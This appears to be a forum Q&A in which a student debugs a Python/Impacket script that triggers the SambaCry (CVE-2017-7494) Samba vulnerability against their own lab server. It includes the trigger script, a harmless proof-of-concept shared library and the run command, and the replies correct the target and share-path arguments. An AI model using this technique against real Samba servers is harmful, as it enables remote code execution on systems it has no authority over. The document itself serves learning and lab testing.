# Script for Sambacry exploit encountered bug

Tags: python, python-sockets, impacket

I am doing a small school cybersec project, there is one small bug with my Python (with Impacket library: transport module for RPC) script. It is a very simple script and payload can be found on GitHub for your reference:
https://github.com/omri9741/cve-2017-7494/blob/master/exploit.py

```
from optparse import OptionParser
from impacket.dcerpc.v5 import transport

def main():
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target", help="target ip address")
    parser.add_option("-m", "--module", dest="module", help="module path on 
target server")

   (options, args) = parser.parse_args()
   if options.target and options.module:
      stringbinding = r'ncacn_np:%s[\pipe\%s]' % (options.target, options.module)
      rpctransport = transport.DCERPCTransportFactory(stringbinding)
      dce = rpctransport.get_dce_rpc()
      dce.connect()

   else:
      parser.print_help()        

if __name__=="__main__":
   main()
```

I have set up the whole system (Kali Linux 2017.1) including Samba server (4.5.8) and the Samba shares has already been tested working (connect OK file transfer OK). Verified NO firewall services running. The payload has also been built into shared object libpoc.so from C file:

```
#include <stdio.h>
int samba_init_module(void)
{
printf("hello from cve-2017-7494 poc! ;)\n");
return 0;
}
```

And header file:

```
#ifndef poc_h__
#define poc_h__
 extern int samba_init_module(void);
#endif  // poc_h__
```

When running the command:

```
python exploit.py -t //localhost/pentest -m /localhost/pentest/libpoc.so
```

I get traceback log:

```
raise socket.error ("Connection error (%s:%s)" % (peer[0], peer[1]), e) socket.error: 
   [Errno Connection error (localhost/pentest:445)] [Errno -2] Name or service not known
```

Answer (score 0):

You should specify just the target FQDN or IP address. For example:

```
python exploit.py -t 192.168.1.10 -m /localhost/pentest/libpoc.so
```

Comment: thanks for comment sir.. but i have done that command and get "STATUS_OBJECT_NAME_NOT_FOUND" error, when my exploit payload is already in the correct folder

Comment: Also tried python exploit.py -t 192.168.1.10 -m /home/pentest

Comment: which is the path of the share as defined in smb.conf